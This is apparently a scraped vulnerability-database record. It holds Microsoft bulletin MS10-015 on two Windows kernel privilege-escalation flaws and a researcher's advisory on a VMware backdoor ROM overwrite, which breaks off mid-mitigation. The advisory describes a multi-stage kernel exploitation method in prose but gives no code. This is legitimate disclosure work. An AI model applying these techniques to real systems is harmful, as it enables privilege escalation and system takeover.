3\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\n\r\nNon-Affected Software\r\nOperating System\r\n\r\nWindows 7 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nDoes this update contain any non-security related changes to functionality? \r\nYes, the update package for all affected Windows platforms (KB977165) includes the changes to the Windows Kernel described in Microsoft Knowledge Base Article 977165.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the February bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tWindows Kernel Exception Handler Vulnerability - CVE-2010-0232 \tWindows Kernel Double Free Vulnerability - CVE-2010-0233\tAggregate Severity Rating\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64\u2013based Systems Service Pack 2*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 and Windows Server 2008 R2, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nWindows Kernel Exception Handler Vulnerability - CVE-2010-0232\r\n\r\nAn elevation of privilege vulnerability exists in the Windows Kernel due to the way the kernel handles certain exceptions. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0232.\r\n\t\r\nMitigating Factors for Windows Kernel Exception Handler Vulnerability - CVE-2010-0232\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\n64-bit Microsoft Windows operating systems and Windows Server 2008 for 32-bit Systems are not affected by this vulnerability.\r\n\u2022\t\r\n\r\nAn attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Windows Kernel Exception Handler Vulnerability - CVE-2010-0232\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the NTVDM subsystem\r\n\r\nNote See Microsoft Knowledge Base Article 979682 for information on how to implement this workaround automatically.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type gpedit.msc in the Open box, and then click OK.\r\n\r\nThis opens the Group Policy console.\r\n\r\n2.\r\n\t\r\n\r\nExpand the Administrative Templates folder, and then click Windows Components.\r\n\r\n3.\r\n\t\r\n\r\nClick the Application Compatibility folder.\r\n\r\n4.\r\n\t\r\n\r\nIn the details pane, double click the Prevent access to 16-bit applications policy setting. By default, this is set to Not Configured.\r\n\r\n5.\r\n\t\r\n\r\nChange the policy setting to Enabled, and then click OK.\r\n\r\nImpact of workaround. Users will not be able to run 16-bit applications.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Windows Kernel Exception Handler Vulnerability - CVE-2010-0232\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an elevation of privilege vulnerability. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe Windows kernel does not properly handle certain exceptions.\r\n\r\nWhat is the Windows Kernel? \r\nThe Windows Kernel is the core of the operating system. It provides system level services such as device management and memory management, allocates processor time to processes, and manages error handling.\r\n\r\nWhat is the Windows Virtual DOS Machine (NTVDM) subsystem? \r\nThe Windows Virtual DOS Machine (NTVDM) subsystem is a protected environment subsystem that emulates MS-DOS and 16-bit Windows within Windows NT-based operating systems. A VDM is created whenever a user starts an MS-DOS application on a Windows NT-based operating system.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take complete control over an affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by ensuring that the Windows Kernel handles the exception properly.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-0232. This issue was first discussed in Microsoft Security Advisory 979682.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nWindows Kernel Double Free Vulnerability - CVE-2010-0233\r\n\r\nAn elevation of privilege vulnerability exists in the Windows Kernel due to a double free condition. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0233.\r\n\t\r\nMitigating Factors for Windows Kernel Double Free Vulnerability - CVE-2010-0233\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Windows Kernel Double Free Vulnerability - CVE-2010-0233\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Windows Kernel Double Free Vulnerability - CVE-2010-0233\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an elevation of privilege vulnerability. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe Windows Kernel does not correctly reset a pointer when freeing memory. This results in a double free condition in the Windows Kernel.\r\n\r\nWhat is the Windows Kernel? \r\nThe Windows Kernel is the core of the operating system. It provides system level services such as device management and memory management, allocates processor time to processes, and manages error handling.\r\n\r\nWhat is a "double free" condition? \r\nA double free condition is a condition in which a program is caused to release or free allocated memory more than once. Releasing memory that has already been freed could lead to memory corruption. An attacker could add arbitrary code to memory that is then executed when the corruption occurs. This code could then be executed at a system level of privilege.\r\n\r\nTypically, this vulnerability will cause a denial of service to occur. However, in some circumstances, code execution could occur. Because of the unique layout of the memory on each affected system, exploiting this vulnerability on a mass scale could be difficult.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take complete control over the affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by ensuring that the Windows Kernel correctly resets pointers when freeing memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nTavis Ormandy of Google Inc. for reporting the Windows Kernel Double Free Vulnerability (CVE-2010-0233)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (February 9, 2010): Bulletin published.", "edition": 1, "cvss3": {}, "published": "2010-02-10T00:00:00", "title": "Microsoft Security Bulletin MS10-015 - Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2010-02-10T00:00:00", "id": "SECURITYVULNS:DOC:23210", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23210", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:45", "description": "Double free() vulnerability, exception handler vulnerability.", "edition": 2, "cvss3": {}, "published": "2010-02-10T00:00:00", "title": "Microsoft Windows kernel privilege escalation", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2010-02-10T00:00:00", "id": "SECURITYVULNS:VULN:10612", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10612", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation\r\n\r\nDerek Soeder\r\nds.adv.pub@gmail.com\r\n\r\nReported: December 5, 2011\r\nPublished: March 30, 2012\r\n\r\n\r\nAFFECTED VENDOR\r\n---------------\r\nVMware, Inc.\r\n\r\n\r\nAFFECTED ENVIRONMENTS\r\n---------------------\r\nThe following VMware product versions are known to be affected:\r\n VMware Server 1.0.10 and earlier\r\n VMware Server 2.0.2 and earlier\r\n VMware Workstation 7.0.0\r\n VMware Workstation 7.1.1 and earlier\r\n VMware ESXi 3.5.0 Update 5\r\n VMware ESXi 4.0.0 Update 4 Build 504850 and earlier\r\n VMware ESXi 4.1.0 Build 320137 (ESXi410-201011401-BG) and earlier\r\n Other related versions not tested but assumed to be affected\r\n\r\nThe following guest operating systems are known to enable exploitation:\r\n Windows NT 4.0\r\n Windows 2000\r\n Windows XP (32-bit)\r\n Windows Server 2003 (32-bit)\r\n\r\n\r\nUNAFFECTED ENVIRONMENTS\r\n-----------------------\r\nThe following VMware product versions are not affected:\r\n VMware Workstation 7.1.2 and later\r\n VMware ESXi 4.0.0 Update 4 with patch ESXi400-201203401-SG\r\n VMware ESXi 4.1.0 Update 1 Build 348481 (ESXi410-201101201-SG) and later\r\n VMware ESXi 5.0.0\r\n\r\nThe following guest operating systems do not appear to permit exploitation:\r\n Windows XP (64-bit)\r\n Windows Server 2003 (64-bit)\r\n Windows Vista (32-bit and 64-bit)\r\n Windows Server 2008 (32-bit and 64-bit)\r\n Windows 7 (32-bit and 64-bit)\r\n Windows Server 2008 R2\r\n\r\n\r\nIDENTIFIERS\r\n-----------\r\nCVE-2012-1515\r\n\r\n\r\nIMPACT\r\n------\r\nThe vulnerability described in this document can be exploited by\r\nunprivileged code running on certain guest operating systems in a\r\nVMware virtual machine in order to execute arbitrary code with kernel\r\nprivileges.\r\n\r\n\r\nVULNERABILITY DETAILS\r\n---------------------\r\nThe VMware backdoor interface consists of a number of operations\r\nissued via I/O instructions executed in the guest with a command\r\nnumber in CX and data or "magic" values in a number of other\r\nregisters. Command 0x1E / 30 (BDOOR_CMD_MESSAGE) and its subcommands\r\n(MESSAGE_TYPE_*) allow messages to be exchanged between the guest and\r\nhost. Since the regular backdoor would only allow for the exchange of\r\nno more than one machine word of data per I/O instruction, a\r\n"high-bandwidth" backdoor exists on port 0x5659 (BDOORHB_PORT) to\r\npermit bulk transmission of data from and to the guest via the REP\r\nOUTSB and REP INSB instructions respectively. If the direction flag\r\nis clear, the host performs the transfer by memcpy'ing directly from\r\nor to its mapping of guest memory, after performing any applicable\r\naddress translations and memory access checks.\r\n\r\nOne special case that the host fails to consider, however, is when a\r\nREP INSB is targeting memory that would normally be emulated as\r\nread-only. If the guest operating system allows an unprivileged user\r\nto address a writable view of read-only memory, the user can exploit\r\nthis vulnerability to modify the ROM's contents whereas he otherwise\r\ncould not. To then parlay this ability into a successful attack\r\nrequires causing privileged code that trusts the ROM to act on the\r\naltered contents in an exploitable way.\r\n\r\n\r\nEXPLOITATION\r\n------------\r\nOnly 32-bit editions of Windows prior to Vista allow an unprivileged\r\nuser to map a PAGE_READWRITE view of the BIOS ROM by launching a\r\nVirtual DOS Machine (NTVDM.EXE). On 32-bit Windows Vista and Windows\r\nServer 2008, NT!VdmpInitialize is hard-coded to map physical addresses\r\n0xC0000 through 0xFFFFF at the corresponding virtual addresses as\r\nPAGE_READONLY, while 32-bit Windows 7 allocates writable virtual\r\nmemory at 0xC0000 and copies in the contents of the BIOS ROM, and VDM\r\nsupport does not exist at all in 64-bit editions of Windows.\r\n(Presumably, ROM was originally mapped as writable so that 16-bit code\r\nthat tried for any reason to write to ROM could do so and have it\r\nsilently fail while still causing the expected side effects like\r\nupdating the flags. One wonders what prompted the change on Vista.)\r\n\r\nAlthough this vulnerability allows modification of the in-guest BIOS\r\nROM, there seem to be few opportunities to get Windows to execute\r\nmodified BIOS code. One possible attack involves putting the modified\r\ncode in place and initiating or waiting for a soft reboot, after which\r\nthe planted code would execute and could mount a BootRoot-style attack\r\nto alter the guest kernel as it loads. Another possibility is to\r\nmodify BIOS code and wait for some other user to run a 16-bit program\r\nthat changes the video mode or makes an exotic BIOS call unhandled by\r\nNTVDM, but this is obviously flimsy. The third and best possibility,\r\ndiscussed below, is to cause the kernel to change the video mode,\r\nwhich will execute an INT 10h instruction from one of two Virtual-8086\r\nmode environments, either of which can be escaped to infiltrate the\r\nkernel.\r\n\r\nAs the author mentioned in the advisory for CVE-2007-1206 (which\r\nallowed modification of the Interrupt Vector Table rather than the\r\nBIOS code it references), HAL.DLL will issue an INT 10h to prepare for\r\nhibernation or a blue-screen, both of which could be considered "local\r\ndenial-of-service" conditions. However, the author has since found\r\nthat requesting full-screen text mode or switching to a VGA display\r\nmode will also cause the INT 10h handler to be executed, although by\r\nNTOSKRNL.EXE rather than HAL. Rough reverse call trees for both are\r\ndepicted below:\r\n\r\n HAL!HalpBiosCall\r\n ^ HAL!HalpBiosDisplayReset (via NT!HalPrivateDispatchTable)\r\n . ^ BOOTVID!VidResetDisplay\r\n . . ^ NT!VidResetDisplay\r\n . . . ^ NT!InbvResetDisplay\r\n . . . . ^ NT!KeBugCheck2\r\n . . . . . ^ (blue-screen)\r\n . . . . ^ HAL!InbvResetDisplay\r\n . . . . . ^ HAL!HalHandleNMI\r\n . . . . . . ^ NT!KiTrap02\r\n . . . . . . . ^ (catastrophe)\r\n . . . . ^ NT!PopSaveHiberContext (via DPC)\r\n . . . . . ^ NT!PopInvokeSystemStateHandler\r\n . . . . . . ^ NT!PopShutdownSystem\r\n . . . . . . . ^ NT!PopGracefulShutdown\r\n . . . . . . . . ^ NT!NtSetSystemPowerState\r\n . . . . . . . . . ^ NT!NtShutdownSystem\r\n . . . . . . ^ NT!PopSleepSystem\r\n . . . . . . . ^ NT!NtSetSystemPowerState\r\n . . . . . . . . ^ NT!NtShutdownSystem\r\n\r\n NT!Ke386CallBios\r\n ^ VIDEOPRT!Ke386CallBios\r\n . ^ VIDEOPRT!VideoPortInt10\r\n . . ^ VGA!VgaSetMode\r\n . . . ^ VGA!VgaStartIO\r\n . . . . ^ VIDEOPRT!pVideoPortDispatch\r\n . . . . . ^ NT!IofCallDriver\r\n . . . . . . ^ WIN32K!GreDeviceIoControl\r\n . . . . . . . ^ WIN32K!EngDeviceIoControl\r\n . . . . . . . . ^ (...)\r\n . . . . . . . . . ^ WIN32K!DrvChangeDisplaySettings\r\n . . . . . . . . . . ^ WIN32K!xxxUserChangeDisplaySettings\r\n . . . . . . . . . . . ^ WIN32K!NtUserChangeDisplaySettings\r\n . . . . . . . . . . . . ^ USER32!NtUserChangeDisplaySettings\r\n . . . . . . . . . . . . . ^ USER32!ChangeDisplaySettings*\r\n . . . . . . . . ^ (...)\r\n . . . . . . . . . ^ WIN32K!xxxbFullscreenSwitch\r\n . . . . . . . . . . ^ WIN32K!xxxConsoleControl\r\n . . . . . . . . . . . ^ WIN32K!NtUserConsoleControl\r\n . . . . . . . . . . . . ^ WINSRV!NtUserConsoleControl\r\n . . . . . . . . . . . . . ^ WINSRV!ChangeDispSettings\r\n . . . . . . . . . . . . . . ^ WINSRV!HandleSysKeyEvent\r\n . . . . . . . . . . . . . . . ^ WINSRV!ConsoleWindowProc\r\n . . . . . . . . . . . . . . . . ^ (...)\r\n . . . . . . . . . . . . . . . . . ^ NTDLL!CsrClientCallServer\r\n . . . . . . . . . . . . . . . . . . ^ KERNEL32!SetConsoleDisplayMode\r\n . . ^ VIDEOPRT!VpInt10CallBios\r\n . . . ^ VGA!GetVideoMemoryBaseAddress\r\n . . . . ^ VGA!VgaSetMode\r\n . . . . . ^ (...)\r\n\r\nAs suggested above, unprivileged code can cause execution of the BIOS\r\nINT 10h handler from either HAL or NTOSKRNL, the former through a\r\nblue-screen or shutdown (such as hibernation), and the latter by\r\nchanging the video mode, which requires console access. Assuming that\r\nmalicious code has access to the console, and assuming that the video\r\ndriver does not prevent it (as the VMware Tools video driver in some\r\ncases does), the malicious code could call ChangeDisplaySettings[Ex]\r\nor SetConsoleDisplayMode to force a video mode change without needing\r\nSeShutdownPrivilege or an independent blue-screen flaw. The following\r\nparagraphs cover exploitation in both the HAL and NTOSKRNL cases,\r\nstarting from the assumption that an attacker has already modified the\r\nBIOS's INT 10h handler code.\r\n\r\nTo infiltrate the kernel when invoked via HAL!HalpBiosCall, the\r\nmalicious INT 10h handler code can simply modify the pages of memory\r\ncontaining HAL!HalpRealModeStart, the V86-mode stack, and\r\nHAL!HalpRealModeEnd, which HAL!HalpBiosDisplayReset maps with write\r\npermissions at virtual address 0x20000. Once execution returns to\r\nHAL!HalpRealModeEnd following attempted execution of the C4h/C4h\r\nsequence, the attacker will be executing code in the familiar Windows\r\nkernel environment, albeit with some cleanup necessary. Malicious\r\ncode might detect the HAL case by observing if SS = 0x2000.\r\n\r\nInfiltrating the kernel from the NT!Ke386CallBios environment, on the\r\nother hand, is a little more indirect. NTOSKRNL issues an INT 10h\r\nfrom a proper VDM with no interesting kernel code targets, but the VDM\r\nTIB is accessible to V86-mode code (at address 0x12000). The\r\nmalicious INT 10h handler can modify the kernel stack pointer stored\r\nin 'CONTEXT.Esi', just as described in Tavis Ormandy's CVE-2010-0232\r\nadvisory ("Microsoft Windows NT #GP Trap Handler Allows Users to\r\nSwitch Kernel Stack"), in order to hijack execution after the cleanup\r\ncode at NT!Ki386BiosCallReturnAddress completes. Malicious code might\r\ndetect the NTOSKRNL case by checking for SS = 0x1000.\r\n\r\nOf course, none of this matters without the ability to meaningfully\r\nmodify BIOS code. Malicious code in the guest can only modify ROM\r\nthrough the high-bandwidth backdoor REP INSB instruction, meaning it\r\ncan only overwrite ROM with bytes it can read from the host. Although\r\nVMware Server 1.0 permits the guest to read host stack memory beyond\r\nthe end of any host-to-guest message, which allows reading of (and\r\ntherefore overwriting with) arbitrary bytes by first "seeding" the\r\nbuffer with a long REP OUTSB, a more version-independent approach is\r\nto first use the "info-set" command to store an arbitrary low-byte\r\nstring in the VMDb "guestinfo" database, and then use "info-get" to\r\nread the string from the host and overwrite the desired portion of\r\nguest ROM.\r\n\r\nThe author's proof-of-concept exploit uses this technique to implement\r\na six-stage approach, comprising: (1) the replacement INT 10h handler,\r\na tiny, low-byte arithmetic / PUSH / Jcc sequence that computes the\r\noffset of the next stage, pushes it, and branches to a nearby RET,\r\nRETF, or IRET; (2) a larger, low-byte sequence stored over the 8x8\r\ngraphics font table (hopefully in video BIOS ROM pointed to by the INT\r\n1Fh vector) that computes the bytes of the next stage, pushes them\r\nonto the stack, and branches to a nearby RETF or IRET; (3) a small,\r\nbase-64-like decoder that decodes and executes the next stage, which\r\nwas also stored in the font table; (4) a loader that reads the\r\nsubsequent stages into RAM from the "guestinfo" database via the\r\nVMware backdoor interface, decodes them, and executes the next stage;\r\n(5) the main V86-mode payload, which prepares the next stage to\r\nexecute in ring 0 using the appropriate, aforementioned HAL or\r\nNTOSKRNL infiltration technique; and (6) the main kernel payload,\r\nwhich creates an interrupt gate for convenient kernel access and\r\ncleans up the environment so that execution can resume without\r\ncrashing. The Win32 portion of the exploit can then use the interrupt\r\ngate as needed.\r\n\r\nWith ring-0 privileges, the payload can restore the original contents\r\nof BIOS ROM (assuming it preserved them) by making ROM writable via\r\nPCI configuration space. In the eight bytes of PCI configuration\r\nspace starting at address 0x80000058, bit 0 and bit 4 each indicate\r\nwhether or not a segment of BIOS ROM is mapped, and bits 1 and 5\r\ndetermine whether or not those segments are writable. Setting the\r\nwritable bits for all mapped segments, then, allows the ROM to be\r\ndirectly overwritten with arbitrary bytes, as opposed to being\r\noverwritten indirectly and only with low bytes through re-exploitation\r\nof the vulnerability.\r\n\r\nAnother ramification of exploitation requiring rectification is the\r\nunavoidable change in video mode. Before it invokes the INT 10h\r\nhandler, the kernel has already changed the display mode and\r\nconsequently blacked out the screen, so programming the malicious\r\nhandler to return without executing the original handler doesn't help\r\nand could actually make it more difficult to properly restore the\r\ndisplay. One easy means of recovering from the mode change is to\r\ninject code into session 0's WINLOGON.EXE process that enumerates\r\ndesktops and calls "ChangeDisplaySettings(NULL, CDS_RESET)" while\r\nattached to each, although some amount of display flickering is\r\nnevertheless inevitable.\r\n\r\n\r\nMITIGATION\r\n----------\r\n\r\n* Disable NTVDM in the guest operating system\r\n\r\nDisabling Virtual DOS Machine (NTVDM) support in the guest should deny\r\nan unprivileged user the ability to obtain a writable mapping of 